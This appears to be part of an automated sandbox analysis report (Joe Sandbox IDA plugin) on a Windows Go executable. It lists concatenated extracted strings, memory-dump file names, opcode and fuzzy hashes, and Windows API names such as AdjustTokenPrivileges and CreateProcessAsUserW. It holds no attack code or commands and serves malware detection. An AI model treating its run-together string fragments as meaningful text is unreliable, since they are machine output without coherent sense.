                                                                                • runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemR, xrefs: 00AC7957
                                                                                • gcBgMarkWorker: blackening not enabledindex out of range [%x] with length %yinsufficient data for base length typeinternal error: unknown string type %dm changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free po, xrefs: 00AC7A25
                                                                                • gcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid P224Element encodinginvalid P384Element encodinginvalid P521Element encodinginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1, xrefs: 00AC79CB
                                                                                • &, xrefs: 00AC7A2E
                                                                                • work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsEx, xrefs: 00AC78D6
                                                                                • work.nwait was > work.nprocx509: malformed certificate args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreate, xrefs: 00AC79B5
                                                                                • worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , , xrefs: 00AC79F0
                                                                                • work.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorW, xrefs: 00AC7934
                                                                                • GC worker initGetConsoleModeGetProcAddressGetShellWindowGetTickCount64GetUserNameExWIsWellKnownSidIsWow64ProcessLoadLibraryExWLoadRegTypeLibMB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoNtResumeThreadOS/2 characterOaBuildVersionOleLoadPictureOpenSCMa, xrefs: 00AC75FE, 00AC760C
                                                                                • runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in syste, xrefs: 00AC78AB
                                                                                • work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcesses, xrefs: 00AC7900, 00AC7981
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-4120117168
                                                                                • Opcode ID: 4143d49a9b3732c880c081edf45253dc3ec364f7aeac792e8b809515f35ef199
                                                                                • Instruction ID: 5e3ed01e9137bbd237a743a4c7a5e78f8c0cc31e28102bbad4aefe4423d7ae71
                                                                                • Opcode Fuzzy Hash: 4143d49a9b3732c880c081edf45253dc3ec364f7aeac792e8b809515f35ef199
                                                                                • Instruction Fuzzy Hash: 63C1DDB49097458FC344EF69D294B5EBBE0BF88304F41896DE8898B352DB74D889CF52
                                                                                Strings
                                                                                • s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_Digi, xrefs: 00ACC31A
                                                                                • ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384, xrefs: 00ACC4FD, 00ACC608
                                                                                • s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteService, xrefs: 00ACC344
                                                                                • s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCall, xrefs: 00ACC36E
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACC558
                                                                                • unknown(wsaioctlx509sha1 (forced) B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, , xrefs: 00ACC41A
                                                                                • <== as at fp= is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1, xrefs: 00ACC5C2
                                                                                • s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltM, xrefs: 00ACC4A9
                                                                                • s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFile, xrefs: 00ACC2F0
                                                                                • ) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4, xrefs: 00ACC582
                                                                                • =?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-, xrefs: 00ACC293
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-2301861421
                                                                                • Opcode ID: 30e9ee588f2285adc31f635d8df9ec80d06d9af8257962e3a3198a7adda58654
                                                                                • Instruction ID: cc52de1c844f41fbd55b3811d9a4d6915f8ac6417f2532564dc9bd18d2ff4400
                                                                                • Opcode Fuzzy Hash: 30e9ee588f2285adc31f635d8df9ec80d06d9af8257962e3a3198a7adda58654
                                                                                • Instruction Fuzzy Hash: 31B1E8B4909B818FC304EF75E295B5EBBE0BF89748F81882DF4898B352D774D9448B52
                                                                                Strings
                                                                                • failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid PE file signature: % xinvalid network interface nameinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socket : Elem of inv, xrefs: 00ABA07A
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AB9FBD, 00ABA049
                                                                                • system huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAze, xrefs: 00AB9EA3
                                                                                • $, xrefs: 00ABA028
                                                                                • bad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing traceGCSweepStartnet/url: i, xrefs: 00AB9EEA
                                                                                • ) must be a power of 223283064365386962890625<invalid .Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeEFI Boot Service DriverFreeEnv, xrefs: 00AB9ECF, 00AB9F31
                                                                                • system page size (tracebackancestorstruncated sequenceuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard Tim, xrefs: 00AB9F05, 00AB9F67, 00AB9FF3
                                                                                • bad TinySizeClassdatadir_certtabledebugPtrmask.lockentersyscallblockexec format errorexec: not startedfractional secondg already scannedglobalAlloc.mutexgp.waiting != nilinteger too largeinvalid BMPStringinvalid IA5Stringinvalid bit size locked m0 woke upmark , xrefs: 00ABA09A
                                                                                • ) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memoryIA5String contains invalid characterPower PC with floating point supportThunk Ad, xrefs: 00ABA01F
                                                                                • bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pflag: help requestedfloating point errorforcegc: phase errorgetCert can't be nilgo of nil func valuegopark: bad g status, xrefs: 00AB9F4C, 00AB9FD8, 00ABA064
                                                                                • ) is smaller than minimum page size (2220446049250313080847263336181640625UnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missing` VirtualAddress is beyond 0x10000000all goroutines are asleep - deadlock!cannot exec a shared library directlyc, xrefs: 00AB9F93
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-1086660936
                                                                                • Opcode ID: f2dbffbc6dcfccd356793f63a64cf65692156b59321d27dd5c0ae58cef411710
                                                                                • Instruction ID: b6477aed7aea703cfc70b7816fca39b3fb36e82183a41704435f4a4984bde7bb
                                                                                • Opcode Fuzzy Hash: f2dbffbc6dcfccd356793f63a64cf65692156b59321d27dd5c0ae58cef411710
                                                                                • Instruction Fuzzy Hash: 72B17AB4508745CFC300EF66E69479EBBE5FB8A308F41882DE48987392E7749849CF12
                                                                                Strings
                                                                                • mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AD21AE
                                                                                • sweep increased allocation counttransform: short internal bufferuse of closed network connectionx509: ECDSA verification failurex509: cannot parse rfc822Name %qx509: invalid constraint value: x509: malformed subjectPublicKeyx509: unsupported elliptic curve of , xrefs: 00AD22CF
                                                                                • swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00AD2134
                                                                                • runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod, xrefs: 00AD2212
                                                                                • mspan.sweep: bad span state after sweepout of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+, xrefs: 00AD21E2
                                                                                • sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagari, xrefs: 00AD2184
                                                                                • previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregist, xrefs: 00AD2269
                                                                                • mspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in , xrefs: 00AD2156
                                                                                • nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebr, xrefs: 00AD223C
                                                                                • , xrefs: 00AD22D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-1471226921
                                                                                • Opcode ID: 0497c5cf18ff1f170b3dec169f1095b0d30ee94ab6e90b3fb5fc5062453221e7
                                                                                • Instruction ID: 9a1e53023412e24af7e6c67f7a529679f1f618b36fa9cd20435c7ff9b9a44950
                                                                                • Opcode Fuzzy Hash: 0497c5cf18ff1f170b3dec169f1095b0d30ee94ab6e90b3fb5fc5062453221e7
                                                                                • Instruction Fuzzy Hash: 461289B45087548FC310EF25C19076EBBE0BF99708F45896EE8C98B392D734D94ADB92
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AFA2A3, 00AFA482
                                                                                • (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame, xrefs: 00AFA279, 00AFA458
                                                                                • untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreatePr, xrefs: 00AFA335
                                                                                • args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextEnglish name for time zone "FindFirs, xrefs: 00AFA24F
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00AFA35F, 00AFA53D
                                                                                • runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of t, xrefs: 00AFA30B, 00AFA4E3
                                                                                • locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "GetProcessPreferredU, xrefs: 00AFA42E
                                                                                • runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown hash value unknown wait reasonwinmm.dll not foundx509: malformed OIDx509: trailin, xrefs: 00AFA1F9, 00AFA3D8
                                                                                • and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521ParamREPRO, xrefs: 00AFA224, 00AFA403
                                                                                • bad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmiss, xrefs: 00AFA2BE, 00AFA49D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-197905243
                                                                                • Opcode ID: f4a3dd08fc5ecf82f9fe75329793ce6400ff68c69ccd3c08116d8c40fc893209
                                                                                • Instruction ID: e06cedb98b356f22fda9b58e9b981582447f456e6636f78292875f2c38a5b16e
                                                                                • Opcode Fuzzy Hash: f4a3dd08fc5ecf82f9fe75329793ce6400ff68c69ccd3c08116d8c40fc893209
                                                                                • Instruction Fuzzy Hash: B702FFB4A08B458FC344EF69D58066EBBE1BF88708F518A2EF99887351D774E844CF52
                                                                                Strings
                                                                                • , xrefs: 00AB5E08
                                                                                • interface conversion: internal inconsistencyinvalid number base %dkernel32.dll not foundminpc or maxpc invalidmissing ']' in addressnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledprotocol not availableprotocol not suppo, xrefs: 00AB5CBD, 00AB5E79, 00AB5F27
                                                                                • : missing method ARM little endianAdjustTokenGroupsAssemblyProcessorCertFindExtensionCreateFileMappingCreateStdDispatchCryptDecodeObjectDispGetIDsOfNamesDllGetClassObjectDllRegisterServerDnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB S, xrefs: 00AB5EB5
                                                                                • is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStore, xrefs: 00AB5F49
                                                                                • , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETStringSundaySyriacTa, xrefs: 00AB5CF9
                                                                                • is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqua, xrefs: 00AB5E93
                                                                                • (types from different packages)!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~28421709430404007434844970703125: day-of-year does not match dayCOFF symbol offset out of boundsCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyGetVolumePathNamesForVolumeNameWMapI, xrefs: 00AB5DFE
                                                                                • interfaceinterruptinvalid nipv6-icmpmSpanDeadmSpanFreentdll.dllole32.dllomitemptypanicwaitpclmulqdqpreemptedprintablepsapi.dllrecover: : rwxrwxrwxscavtracestackpooltracebackunderflowwbufSpans} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= ru, xrefs: 00AB5C32
                                                                                • (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Tim, xrefs: 00AB5E36
                                                                                • is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1, xrefs: 00AB5CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API String ID: 0-365028384
                                                                                • Opcode ID: 272b4b48ec98fc7788f7c7f296f86ad3ee89e783e0ca4ce86696bddbb27340bf
                                                                                • Instruction ID: ad904935eb1b544898ee1f84b9b518bb3a6066723c4ca6452d2e71b298aa2abf
                                                                                • Opcode Fuzzy Hash: 272b4b48ec98fc7788f7c7f296f86ad3ee89e783e0ca4ce86696bddbb27340bf
                                                                                • Instruction Fuzzy Hash: CFA188B49083409FD318DF64D580BAABBF1BB88704F50892EE89987351DB75A848CF52
                                                                                Strings
                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00AE0A51
                                                                                • : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)v, xrefs: 00AE0B3B
                                                                                • : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definit, xrefs: 00AE0B07
                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlap : missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0invalid padding bits in BIT STRINGmspan.ensureSwept: m i, xrefs: 00AE0A85
                                                                                • CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscall : failed to generate random pointinvalid certificate header in security directorynot enough significa, xrefs: 00AE0AE0
                                                                                • ,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-, xrefs: 00AE09E5
                                                                                • %, xrefs: 00AE0B44
                                                                                • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definition of NAFx509: IP constraint contained inval, xrefs: 00AE0AAC
                                                                                • bad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertraceharddecommithost is downillegal seekinvalid baseinvalid slotiphlpapi.dllkernel32.dllmadvdontneedmheapSpecialmspanSpe, xrefs: 00AE0A2A
                                                                                • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown hash value unknown wait reasonwinmm.dll not foundx509: malform, xrefs: 00AE09BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API String ID: 0-3267003949
                                                                                • Opcode ID: 04ec345bab4de8249725218a257766fccacbc0bed5dabacbb90328ad1b5c7312
                                                                                • Instruction ID: 8d2180836e7400da263c8f797403f3a928122a3a57f2daf170351b2a163906e2
                                                                                • Opcode Fuzzy Hash: 04ec345bab4de8249725218a257766fccacbc0bed5dabacbb90328ad1b5c7312
                                                                                • Instruction Fuzzy Hash: 3981D3B4509B818FD300EF65D295B5EBBE0AF88748F40896DF4888B392D7B4D945CF52
                                                                                Strings
                                                                                • to unallocated span37252902984619140625Arabic Standard TimeAssemblyRefProcessorAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWEgyptian_HieroglyphsEnumProcessModulesEx, xrefs: 00AC0344
                                                                                • span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM image, xrefs: 00AC0376
                                                                                • objectpopcntrdtscpreadatsecondselectsendtosocketstringstructsweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5., xrefs: 00AC02F6
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00AC02B1
